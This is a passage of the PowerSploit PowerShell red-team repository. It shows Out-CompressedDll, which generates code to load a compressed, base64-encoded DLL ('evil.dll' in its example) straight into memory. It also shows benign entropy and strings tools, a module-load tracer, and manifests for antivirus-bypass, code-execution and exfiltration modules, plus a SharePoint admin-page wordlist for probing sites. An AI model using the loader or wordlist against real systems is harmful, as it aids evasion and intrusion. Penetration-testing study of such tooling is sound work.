${ArgumentList}, 17 | 18 | [Parameter(ParameterSetName='Com')] 19 | [switch] 20 | ${Strict}, 21 | 22 | [System.Collections.IDictionary] 23 | ${Property}) 24 | 25 | begin 26 | { 27 | Set-StrictMode -Version 2 28 | 29 | try { 30 | $outBuffer = $null 31 | if ($PSBoundParameters.TryGetValue('OutBuffer', [ref]$outBuffer)) 32 | { 33 | $PSBoundParameters['OutBuffer'] = 1 34 | } 35 | 36 | $ClsidPresent = $true 37 | $Guid = [Guid]::NewGuid() 38 | 39 | try 40 | { 41 | $Guid = [Guid] $PSBoundParameters['ComObject'] 42 | } 43 | catch 44 | { 45 | $ClsidPresent = $false 46 | 47 | $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand('New-Object', [System.Management.Automation.CommandTypes]::Cmdlet) 48 | $scriptCmd = {& $wrappedCmd @PSBoundParameters } 49 | $steppablePipeline = $scriptCmd.GetSteppablePipeline($myInvocation.CommandOrigin) 50 | $steppablePipeline.Begin($PSCmdlet) 51 | } 52 | } catch { 53 | throw 54 | } 55 | } 56 | 57 | process 58 | { 59 | if ($ClsidPresent) 60 | { 61 | [Activator]::CreateInstance([Type]::GetTypeFromCLSID($Guid), $Property) 62 | } 63 | else 64 | { 65 | try { 66 | $steppablePipeline.Process($_) 67 | } catch { 68 | throw 69 | } 70 | } 71 | } 72 | 73 | end 74 | { 75 | if (!$ClsidPresent) 76 | { 77 | try { 78 | $steppablePipeline.End() 79 | } catch { 80 | throw 81 | } 82 | } 83 | } 84 | <# 85 | 86 | .ForwardHelpTargetName New-Object 87 | .ForwardHelpCategory Cmdlet 88 | 89 | #> 90 | } 91 | -------------------------------------------------------------------------------- /ScriptModification/Out-CompressedDll.ps1: -------------------------------------------------------------------------------- 1 | function Out-CompressedDll 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. 7 | 8 | PowerSploit Function: Out-CompressedDll 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array. 17 | 18 | .PARAMETER FilePath 19 | 20 | Specifies the path to a managed executable. 21 | 22 | .EXAMPLE 23 | 24 | C:\PS> Out-CompressedDll -FilePath evil.dll 25 | 26 | Description 27 | ----------- 28 | Compresses, base64 encodes, and outputs the code required to load evil.dll in memory. 29 | 30 | .NOTES 31 | 32 | Only pure MSIL-based dlls can be loaded using this technique. Native or IJW ('it just works' - mixed-mode) dlls will not load. 33 | 34 | .LINK 35 | 36 | http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html 37 | #> 38 | 39 | [CmdletBinding()] Param ( 40 | [Parameter(Mandatory = $True)] 41 | [String] 42 | $FilePath 43 | ) 44 | 45 | $Path = Resolve-Path $FilePath 46 | 47 | if (! [IO.File]::Exists($Path)) 48 | { 49 | Throw "$Path does not exist." 50 | } 51 | 52 | $FileBytes = [System.IO.File]::ReadAllBytes($Path) 53 | 54 | if (($FileBytes[0..1] | % {[Char]$_}) -join '' -cne 'MZ') 55 | { 56 | Throw "$Path is not a valid executable." 57 | } 58 | 59 | $Length = $FileBytes.Length 60 | $CompressedStream = New-Object IO.MemoryStream 61 | $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress) 62 | $DeflateStream.Write($FileBytes, 0, $FileBytes.Length) 63 | $DeflateStream.Dispose() 64 | $CompressedFileBytes = $CompressedStream.ToArray() 65 | $CompressedStream.Dispose() 66 | $EncodedCompressedFile = [Convert]::ToBase64String($CompressedFileBytes) 67 | 68 | Write-Verbose "Compression ratio: $(($EncodedCompressedFile.Length/$FileBytes.Length).ToString('#%'))" 69 | 70 | $Output = @" 71 | `$EncodedCompressedFile = @' 72 | $EncodedCompressedFile 73 | '@ 74 | `$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`$EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress) 75 | `$UncompressedFileBytes = New-Object Byte[]($Length) 76 | `$DeflatedStream.Read(`$UncompressedFileBytes, 0, $Length) | Out-Null 77 | [Reflection.Assembly]::Load(`$UncompressedFileBytes) 78 | "@ 79 | 80 | Write-Output $Output 81 | } 82 | -------------------------------------------------------------------------------- /ReverseEngineering/Get-Entropy.ps1: -------------------------------------------------------------------------------- 1 | function Get-Entropy 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Calculates the entropy of a file or byte array. 7 | 8 | PowerSploit Function: Get-Entropy 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .PARAMETER ByteArray 15 | 16 | Specifies the byte array containing the data from which entropy will be calculated. 17 | 18 | .PARAMETER FilePath 19 | 20 | Specifies the path to the input file from which entropy will be calculated. 21 | 22 | .EXAMPLE 23 | 24 | C:\PS>Get-Entropy -FilePath C:\Windows\System32\kernel32.dll 25 | 26 | .EXAMPLE 27 | 28 | C:\PS>ls C:\Windows\System32\*.dll | % { Get-Entropy -FilePath $_ } 29 | 30 | .EXAMPLE 31 | 32 | C:\PS>$RandArray = New-Object Byte[](10000) 33 | C:\PS>foreach ($Offset in 0..9999) { $RandArray[$Offset] = [Byte] (Get-Random -Min 0 -Max 256) } 34 | C:\PS>$RandArray | Get-Entropy 35 | 36 | Description 37 | ----------- 38 | Calculates the entropy of a large array containing random bytes. 39 | 40 | .EXAMPLE 41 | 42 | C:\PS> 0..255 | Get-Entropy 43 | 44 | Description 45 | ----------- 46 | Calculates the entropy of 0-255. This should equal exactly 8. 47 | 48 | .OUTPUTS 49 | 50 | System.Double 51 | 52 | Get-Entropy outputs a double representing the entropy of the byte array. 53 | 54 | .LINK 55 | 56 | http://www.exploit-monday.com 57 | #> 58 | 59 | [CmdletBinding()] Param ( 60 | [Parameter(Mandatory = $True, Position = 0, ValueFromPipeline = $True, ParameterSetName = 'Bytes')] 61 | [ValidateNotNullOrEmpty()] 62 | [Byte[]] 63 | $ByteArray, 64 | 65 | [Parameter(Mandatory = $True, Position = 0, ParameterSetName = 'File')] 66 | [ValidateNotNullOrEmpty()] 67 | [IO.FileInfo] 68 | $FilePath 69 | ) 70 | 71 | BEGIN 72 | { 73 | $FrequencyTable = @{} 74 | $ByteArrayLength = 0 75 | } 76 | 77 | PROCESS 78 | { 79 | if ($PsCmdlet.ParameterSetName -eq 'File') 80 | { 81 | $ByteArray = [IO.File]::ReadAllBytes($FilePath.FullName) 82 | } 83 | 84 | foreach ($Byte in $ByteArray) 85 | { 86 | $FrequencyTable[$Byte]++ 87 | $ByteArrayLength++ 88 | } 89 | } 90 | 91 | END 92 | { 93 | $Entropy = 0.0 94 | 95 | foreach ($Byte in 0..255) 96 | { 97 | $ByteProbability = ([Double] $FrequencyTable[[Byte]$Byte]) / $ByteArrayLength 98 | if ($ByteProbability -gt 0) 99 | { 100 | $Entropy += -$ByteProbability * [Math]::Log($ByteProbability, 2) 101 | } 102 | } 103 | 104 | Write-Output $Entropy 105 | } 106 | } -------------------------------------------------------------------------------- /ReverseEngineering/Get-Strings.ps1: -------------------------------------------------------------------------------- 1 | function Get-Strings 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Gets strings from a file. 7 | 8 | PowerSploit Function: Get-Strings 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | The Get-Strings cmdlet returns strings (Unicode and/or Ascii) from a file. This cmdlet is useful for dumping strings from binary file and was designed to replicate the functionality of strings.exe from Sysinternals. 17 | 18 | .PARAMETER Path 19 | 20 | Specifies the path to an item. 21 | 22 | .PARAMETER Encoding 23 | 24 | Specifies the file encoding. The default value returns both Unicode and Ascii. 25 | 26 | .PARAMETER MinimumLength 27 | 28 | Specifies the minimum length string to return. The default string length is 3. 29 | 30 | .EXAMPLE 31 | 32 | C:\PS> Get-Strings C:\Windows\System32\calc.exe 33 | 34 | Description 35 | ----------- 36 | Dump Unicode and Ascii strings of calc.exe. 37 | 38 | .EXAMPLE 39 | 40 | C:\PS> Get-ChildItem C:\Windows\System32\*.dll | Get-Strings -MinimumLength 12 -Encoding Ascii 41 | 42 | Description 43 | ----------- 44 | Dumps Ascii strings of at least length 12 of every dll located in C:\Windows\System32. 45 | 46 | .NOTES 47 | 48 | This cmdlet was designed to intentionally use only PowerShell cmdlets (no .NET methods) in order to be compatible with PowerShell on Windows RT (or any ConstrainedLanguage runspace). 49 | 50 | .LINK 51 | 52 | http://www.exploit-monday.com 53 | #> 54 | 55 | Param 56 | ( 57 | [Parameter(Position = 1, Mandatory = $True, ValueFromPipelineByPropertyName = $True)] 58 | [ValidateNotNullOrEmpty()] 59 | [ValidateScript({Test-Path $_ -PathType 'Leaf'})] 60 | [String[]] 61 | [Alias('PSPath')] 62 | $Path, 63 | 64 | [ValidateSet('Default','Ascii','Unicode')] 65 | [String] 66 | $Encoding = 'Default', 67 | 68 | [UInt32] 69 | $MinimumLength = 3 70 | ) 71 | 72 | BEGIN 73 | { 74 | $FileContents = '' 75 | } 76 | PROCESS 77 | { 78 | foreach ($File in $Path) 79 | { 80 | if ($Encoding -eq 'Unicode' -or $Encoding -eq 'Default') 81 | { 82 | $UnicodeFileContents = Get-Content -Encoding 'Unicode' $File 83 | $UnicodeRegex = [Regex] "[\u0020-\u007E]{$MinimumLength,}" 84 | $Results += $UnicodeRegex.Matches($UnicodeFileContents) 85 | } 86 | 87 | if ($Encoding -eq 'Ascii' -or $Encoding -eq 'Default') 88 | { 89 | $AsciiFileContents = Get-Content -Encoding 'UTF7' $File 90 | $AsciiRegex = [Regex] "[\x20-\x7E]{$MinimumLength,}" 91 | $Results = $AsciiRegex.Matches($AsciiFileContents) 92 | } 93 | 94 | $Results | ForEach-Object { Write-Output $_.Value } 95 | } 96 | } 97 | END {} 98 | } 99 | -------------------------------------------------------------------------------- /AntivirusBypass/AntivirusBypass.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'AntivirusBypass.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '1.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Company or vendor of this module 16 | CompanyName = '' 17 | 18 | # Copyright statement for this module 19 | Copyright = 'BSD 3-Clause' 20 | 21 | # Description of the functionality provided by this module 22 | Description = 'PowerSploit Antivirus Avoidance/Bypass Module' 23 | 24 | # Minimum version of the Windows PowerShell engine required by this module 25 | PowerShellVersion = '2.0' 26 | 27 | # Name of the Windows PowerShell host required by this module 28 | # PowerShellHostName = '' 29 | 30 | # Minimum version of the Windows PowerShell host required by this module 31 | # PowerShellHostVersion = '' 32 | 33 | # Minimum version of the .NET Framework required by this module 34 | # DotNetFrameworkVersion = '' 35 | 36 | # Minimum version of the common language runtime (CLR) required by this module 37 | # CLRVersion = '' 38 | 39 | # Processor architecture (None, X86, Amd64) required by this module 40 | # ProcessorArchitecture = '' 41 | 42 | # Modules that must be imported into the global environment prior to importing this module 43 | # RequiredModules = @() 44 | 45 | # Assemblies that must be loaded prior to importing this module 46 | # RequiredAssemblies = @() 47 | 48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module. 49 | # ScriptsToProcess = '' 50 | 51 | # Type files (.ps1xml) to be loaded when importing this module 52 | # TypesToProcess = @() 53 | 54 | # Format files (.ps1xml) to be loaded when importing this module 55 | # FormatsToProcess = @() 56 | 57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess 58 | # NestedModules = @() 59 | 60 | # Functions to export from this module 61 | FunctionsToExport = '*' 62 | 63 | # Cmdlets to export from this module 64 | CmdletsToExport = '*' 65 | 66 | # Variables to export from this module 67 | VariablesToExport = '' 68 | 69 | # Aliases to export from this module 70 | AliasesToExport = '' 71 | 72 | # List of all modules packaged with this module. 73 | ModuleList = @(@{ModuleName = 'AntivirusBypass'; ModuleVersion = '1.0.0.0'; GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'}) 74 | 75 | # List of all files packaged with this module 76 | FileList = 'AntivirusBypass.psm1', 'AntivirusBypass.psd1', 'Find-AVSignature.ps1', 'Usage.md' 77 | 78 | # Private data to pass to the module specified in RootModule/ModuleToProcess 79 | # PrivateData = '' 80 | 81 | # HelpInfo URI of this module 82 | # HelpInfoURI = '' 83 | 84 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. 85 | # DefaultCommandPrefix = '' 86 | 87 | } 88 | -------------------------------------------------------------------------------- /Recon/Recon.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'Recon.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '1.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = '7e775ad6-cd3d-4a93-b788-da067274c877' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Company or vendor of this module 16 | CompanyName = '' 17 | 18 | # Copyright statement for this module 19 | Copyright = 'BSD 3-Clause' 20 | 21 | # Description of the functionality provided by this module 22 | Description = 'PowerSploit Reconnaissance Module' 23 | 24 | # Minimum version of the Windows PowerShell engine required by this module 25 | PowerShellVersion = '2.0' 26 | 27 | # Name of the Windows PowerShell host required by this module 28 | # PowerShellHostName = '' 29 | 30 | # Minimum version of the Windows PowerShell host required by this module 31 | # PowerShellHostVersion = '' 32 | 33 | # Minimum version of the .NET Framework required by this module 34 | # DotNetFrameworkVersion = '' 35 | 36 | # Minimum version of the common language runtime (CLR) required by this module 37 | # CLRVersion = '' 38 | 39 | # Processor architecture (None, X86, Amd64) required by this module 40 | # ProcessorArchitecture = '' 41 | 42 | # Modules that must be imported into the global environment prior to importing this module 43 | # RequiredModules = @() 44 | 45 | # Assemblies that must be loaded prior to importing this module 46 | # RequiredAssemblies = @() 47 | 48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module. 49 | # ScriptsToProcess = '' 50 | 51 | # Type files (.ps1xml) to be loaded when importing this module 52 | # TypesToProcess = @() 53 | 54 | # Format files (.ps1xml) to be loaded when importing this module 55 | # FormatsToProcess = @() 56 | 57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess 58 | # NestedModules = @() 59 | 60 | # Functions to export from this module 61 | FunctionsToExport = '*' 62 | 63 | # Cmdlets to export from this module 64 | CmdletsToExport = '*' 65 | 66 | # Variables to export from this module 67 | VariablesToExport = '' 68 | 69 | # Aliases to export from this module 70 | AliasesToExport = '' 71 | 72 | # List of all modules packaged with this module. 73 | ModuleList = @(@{ModuleName = 'Recon'; ModuleVersion = '1.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'}) 74 | 75 | # List of all files packaged with this module 76 | FileList = 'Recon.psm1', 'Recon.psd1', 'Get-HttpStatus.ps1', 'Invoke-ReverseDnsLookup.ps1', 77 | 'Invoke-Portscan.ps1', 'Usage.md' 78 | 79 | # Private data to pass to the module specified in RootModule/ModuleToProcess 80 | # PrivateData = '' 81 | 82 | # HelpInfo URI of this module 83 | # HelpInfoURI = '' 84 | 85 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. 86 | # DefaultCommandPrefix = '' 87 | 88 | } 89 | -------------------------------------------------------------------------------- /ReverseEngineering/ProcessModuleTrace.ps1: -------------------------------------------------------------------------------- 1 | function Register-ProcessModuleTrace 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Starts a trace of loaded process modules 7 | 8 | PowerSploit Function: Register-ProcessModuleTrace 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .OUTPUTS 15 | 16 | System.Management.Automation.PSEventJob 17 | 18 | If desired, you can manipulate the event returned with the *-Event cmdlets. 19 | 20 | .LINK 21 | 22 | http://www.exploit-monday.com/ 23 | #> 24 | 25 | [CmdletBinding()] Param () 26 | 27 | if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')) 28 | { 29 | throw 'You must run this cmdlet from an elevated PowerShell session.' 30 | } 31 | 32 | $ModuleLoadedAction = { 33 | $Event = $EventArgs.NewEvent 34 | 35 | $ModuleInfo = @{ 36 | TimeCreated = [DateTime]::FromFileTime($Event.TIME_CREATED) 37 | ProcessId = $Event.ProcessId 38 | FileName = $Event.FileName 39 | ImageBase = $Event.ImageBase 40 | ImageSize = $Event.ImageSize 41 | } 42 | 43 | $ModuleObject = New-Object PSObject -Property $ModuleInfo 44 | $ModuleObject.PSObject.TypeNames[0] = 'LOADED_MODULE' 45 | 46 | $ModuleObject 47 | } 48 | 49 | Register-WmiEvent 'Win32_ModuleLoadTrace' -SourceIdentifier 'ModuleLoaded' -Action $ModuleLoadedAction 50 | } 51 | 52 | function Get-ProcessModuleTrace 53 | { 54 | <# 55 | .SYNOPSIS 56 | 57 | Displays the process modules that have been loaded since the call to Register-ProcessModuleTrace 58 | 59 | PowerSploit Function: Get-ProcessModuleTrace 60 | Author: Matthew Graeber (@mattifestation) 61 | License: BSD 3-Clause 62 | Required Dependencies: Register-ProcessModuleTrace 63 | Optional Dependencies: None 64 | 65 | .OUTPUTS 66 | 67 | PSObject 68 | 69 | .LINK 70 | 71 | http://www.exploit-monday.com/ 72 | #> 73 | 74 | $Events = Get-EventSubscriber -SourceIdentifier 'ModuleLoaded' -ErrorVariable NoEventRegistered -ErrorAction SilentlyContinue 75 | 76 | if ($NoEventRegistered) 77 | { 78 | throw 'You must execute Register-ProcessModuleTrace before you can retrieve a loaded module list' 79 | } 80 | 81 | $Events.Action.Output 82 | } 83 | 84 | function Unregister-ProcessModuleTrace 85 | { 86 | <# 87 | .SYNOPSIS 88 | 89 | Stops the running process module trace 90 | 91 | PowerSploit Function: Unregister-ProcessModuleTrace 92 | Author: Matthew Graeber (@mattifestation) 93 | License: BSD 3-Clause 94 | Required Dependencies: Register-ProcessModuleTrace 95 | Optional Dependencies: None 96 | 97 | .LINK 98 | 99 | http://www.exploit-monday.com/ 100 | #> 101 | 102 | Unregister-Event -SourceIdentifier 'ModuleLoaded' 103 | } 104 | -------------------------------------------------------------------------------- /CodeExecution/CodeExecution.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'CodeExecution.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '1.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Company or vendor of this module 16 | CompanyName = '' 17 | 18 | # Copyright statement for this module 19 | Copyright = 'BSD 3-Clause' 20 | 21 | # Description of the functionality provided by this module 22 | Description = 'PowerSploit Code Execution Module' 23 | 24 | # Minimum version of the Windows PowerShell engine required by this module 25 | PowerShellVersion = '2.0' 26 | 27 | # Name of the Windows PowerShell host required by this module 28 | # PowerShellHostName = '' 29 | 30 | # Minimum version of the Windows PowerShell host required by this module 31 | # PowerShellHostVersion = '' 32 | 33 | # Minimum version of the .NET Framework required by this module 34 | # DotNetFrameworkVersion = '' 35 | 36 | # Minimum version of the common language runtime (CLR) required by this module 37 | # CLRVersion = '' 38 | 39 | # Processor architecture (None, X86, Amd64) required by this module 40 | # ProcessorArchitecture = '' 41 | 42 | # Modules that must be imported into the global environment prior to importing this module 43 | # RequiredModules = @() 44 | 45 | # Assemblies that must be loaded prior to importing this module 46 | # RequiredAssemblies = @() 47 | 48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module. 49 | # ScriptsToProcess = '' 50 | 51 | # Type files (.ps1xml) to be loaded when importing this module 52 | # TypesToProcess = @() 53 | 54 | # Format files (.ps1xml) to be loaded when importing this module 55 | # FormatsToProcess = @() 56 | 57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess 58 | # NestedModules = @() 59 | 60 | # Functions to export from this module 61 | FunctionsToExport = '*' 62 | 63 | # Cmdlets to export from this module 64 | CmdletsToExport = '*' 65 | 66 | # Variables to export from this module 67 | VariablesToExport = '' 68 | 69 | # Aliases to export from this module 70 | AliasesToExport = '' 71 | 72 | # List of all modules packaged with this module. 73 | ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'}) 74 | 75 | # List of all files packaged with this module 76 | FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1', 77 | 'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Watch-BlueScreen.ps1', 'Usage.md' 78 | 79 | # Private data to pass to the module specified in RootModule/ModuleToProcess 80 | # PrivateData = '' 81 | 82 | # HelpInfo URI of this module 83 | # HelpInfoURI = '' 84 | 85 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. 86 | # DefaultCommandPrefix = '' 87 | 88 | } 89 | -------------------------------------------------------------------------------- /ScriptModification/ScriptModification.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'ScriptModification.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '1.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Company or vendor of this module 16 | CompanyName = '' 17 | 18 | # Copyright statement for this module 19 | Copyright = 'BSD 3-Clause' 20 | 21 | # Description of the functionality provided by this module 22 | Description = 'PowerSploit Script Preparation/Modification Module' 23 | 24 | # Minimum version of the Windows PowerShell engine required by this module 25 | PowerShellVersion = '2.0' 26 | 27 | # Name of the Windows PowerShell host required by this module 28 | # PowerShellHostName = '' 29 | 30 | # Minimum version of the Windows PowerShell host required by this module 31 | # PowerShellHostVersion = '' 32 | 33 | # Minimum version of the .NET Framework required by this module 34 | # DotNetFrameworkVersion = '' 35 | 36 | # Minimum version of the common language runtime (CLR) required by this module 37 | # CLRVersion = '' 38 | 39 | # Processor architecture (None, X86, Amd64) required by this module 40 | # ProcessorArchitecture = '' 41 | 42 | # Modules that must be imported into the global environment prior to importing this module 43 | # RequiredModules = @() 44 | 45 | # Assemblies that must be loaded prior to importing this module 46 | # RequiredAssemblies = @() 47 | 48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module. 49 | # ScriptsToProcess = '' 50 | 51 | # Type files (.ps1xml) to be loaded when importing this module 52 | # TypesToProcess = @() 53 | 54 | # Format files (.ps1xml) to be loaded when importing this module 55 | # FormatsToProcess = @() 56 | 57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess 58 | # NestedModules = @() 59 | 60 | # Functions to export from this module 61 | FunctionsToExport = '*' 62 | 63 | # Cmdlets to export from this module 64 | CmdletsToExport = '*' 65 | 66 | # Variables to export from this module 67 | VariablesToExport = '' 68 | 69 | # Aliases to export from this module 70 | AliasesToExport = '' 71 | 72 | # List of all modules packaged with this module. 73 | ModuleList = @(@{ModuleName = 'ScriptModification'; ModuleVersion = '1.0.0.0'; GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'}) 74 | 75 | # List of all files packaged with this module 76 | FileList = 'ScriptModification.psm1', 'ScriptModification.psd1', 'Out-CompressedDll.ps1', 'Out-EncodedCommand.ps1', 77 | 'Out-EncryptedScript.ps1', 'Remove-Comments.ps1', 'Usage.md' 78 | 79 | # Private data to pass to the module specified in RootModule/ModuleToProcess 80 | # PrivateData = '' 81 | 82 | # HelpInfo URI of this module 83 | # HelpInfoURI = '' 84 | 85 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. 86 | # DefaultCommandPrefix = '' 87 | 88 | } 89 | -------------------------------------------------------------------------------- /Recon/Dictionaries/sharepoint.txt: -------------------------------------------------------------------------------- 1 | _catalogs/masterpage/Forms/AllItems.aspx 2 | _catalogs/wp/Forms/AllItems.aspx 3 | _catalogs/wt/Forms/Common.aspx 4 | _layouts/1033/IMAGES 5 | _layouts/aclinv.aspx 6 | _layouts/addrole.aspx 7 | _layouts/AdminRecycleBin.aspx 8 | _layouts/AreaNavigationSettings.aspx 9 | _Layouts/AreaTemplateSettings.aspx 10 | _Layouts/AreaWelcomePage.aspx 11 | _layouts/associatedgroups.aspx 12 | _layouts/bpcf.aspx 13 | _Layouts/ChangeSiteMasterPage.aspx 14 | _layouts/create.aspx 15 | _layouts/editgrp.aspx 16 | _layouts/editprms.aspx 17 | _layouts/groups.aspx 18 | _layouts/help.aspx 19 | _layouts/images/ 20 | _layouts/listedit.aspx 21 | _layouts/ManageFeatures.aspx 22 | _layouts/ManageFeatures.aspx?Scope=Site 23 | _layouts/mcontent.aspx 24 | _layouts/mngctype.aspx 25 | _layouts/mngfield.aspx 26 | _layouts/mngsiteadmin.aspx 27 | _layouts/mngsubwebs.aspx 28 | _layouts/mngsubwebs.aspx?view=sites 29 | _layouts/mobile/mbllists.aspx 30 | _layouts/MyInfo.aspx 31 | _layouts/MyPage.aspx 32 | _layouts/MyTasks.aspx 33 | _layouts/navoptions.aspx 34 | _layouts/NewDwp.aspx 35 | _layouts/newgrp.aspx 36 | _layouts/newsbweb.aspx 37 | _layouts/PageSettings.aspx 38 | _layouts/people.aspx 39 | _layouts/people.aspx?MembershipGroupId=0 40 | _layouts/permsetup.aspx 41 | _layouts/picker.aspx 42 | _layouts/policy.aspx 43 | _layouts/policyconfig.aspx 44 | _layouts/policycts.aspx 45 | _layouts/Policylist.aspx 46 | _layouts/prjsetng.aspx 47 | _layouts/quiklnch.aspx 48 | _layouts/recyclebin.aspx 49 | _Layouts/RedirectPage.aspx?Target={SiteCollectionUrl}_catalogs/masterpage 50 | _layouts/role.aspx 51 | _layouts/settings.aspx 52 | _layouts/SiteDirectorySettings.aspx 53 | _layouts/sitemanager.aspx 54 | _Layouts/SiteManager.aspx?lro=all 55 | _layouts/spcf.aspx 56 | _layouts/storman.aspx 57 | _layouts/themeweb.aspx 58 | _layouts/topnav.aspx 59 | _layouts/user.aspx 60 | _layouts/userdisp.aspx 61 | _layouts/userdisp.aspx?ID=1 62 | _layouts/useredit.aspx 63 | _layouts/useredit.aspx?ID=1&Source=%2F%5Flayouts%2Fpeople%2Easpx 64 | _layouts/viewgrouppermissions.aspx 65 | _layouts/viewlsts.aspx 66 | _layouts/vsubwebs.aspx 67 | _layouts/WPPrevw.aspx?ID=247 68 | _layouts/wrkmng.aspx 69 | _vti_bin/Admin.asmx 70 | _vti_bin/alerts.asmx 71 | _vti_bin/dspsts.asmx 72 | _vti_bin/forms.asmx 73 | _vti_bin/Lists.asmx 74 | _vti_bin/people.asmx 75 | _vti_bin/Permissions.asmx 76 | _vti_bin/search.asmx 77 | _vti_bin/UserGroup.asmx 78 | _vti_bin/versions.asmx 79 | _vti_bin/Views.asmx 80 | _vti_bin/webpartpages.asmx 81 | _vti_bin/webs.asmx 82 | _vti_bin/spsdisco.aspx 83 | _vti_bin/AreaService.asmx 84 | _vti_bin/BusinessDataCatalog.asmx 85 | _vti_bin/ExcelService.asmx 86 | _vti_bin/SharepointEmailWS.asmx 87 | _vti_bin/spscrawl.asmx 88 | _vti_bin/spsearch.asmx 89 | _vti_bin/UserProfileService.asmx 90 | _vti_bin/WebPartPages.asmx 91 | default.aspx 92 | Forms/DispForm.aspx 93 | Forms/DispForm.aspx?ID=1 94 | Forms/EditForm.aspx 95 | Forms/EditForm.aspx?ID=1 96 | Forms/Forms/AllItems.aspx 97 | Forms/MyItems.aspx 98 | Forms/NewForm.aspx 99 | Pages/default.aspx 100 | Pages/Forms/AllItems.aspx 101 | shared documents/forms/allitems.aspx -------------------------------------------------------------------------------- /Exfiltration/Exfiltration.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'Exfiltration.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '1.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Company or vendor of this module 16 | CompanyName = '' 17 | 18 | # Copyright statement for this module 19 | Copyright = 'BSD 3-Clause' 20 | 21 | # Description of the functionality provided by this module 22 | Description = 'PowerSploit Exfiltration Module' 23 | 24 | # Minimum version of the Windows PowerShell engine required by this module 25 | PowerShellVersion = '2.0' 26 | 27 | # Name of the Windows PowerShell host required by this module 28 | # PowerShellHostName = '' 29 | 30 | # Minimum version of the Windows PowerShell host required by this module 31 | # PowerShellHostVersion = '' 32 | 33 | # Minimum version of the .NET Framework required by this module 34 | # DotNetFrameworkVersion = '' 35 | 36 | # Minimum version of the common language runtime (CLR) required by this module 37 | # CLRVersion = '' 38 | 39 | # Processor architecture (None, X86, Amd64) required by this module 40 | # ProcessorArchitecture = '' 41 | 42 | # Modules that must be imported into the global environment prior to importing this module 43 | # RequiredModules = @() 44 | 45 | # Assemblies that must be loaded prior to importing this module 46 | # RequiredAssemblies = @() 47 | 48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module. 49 | # 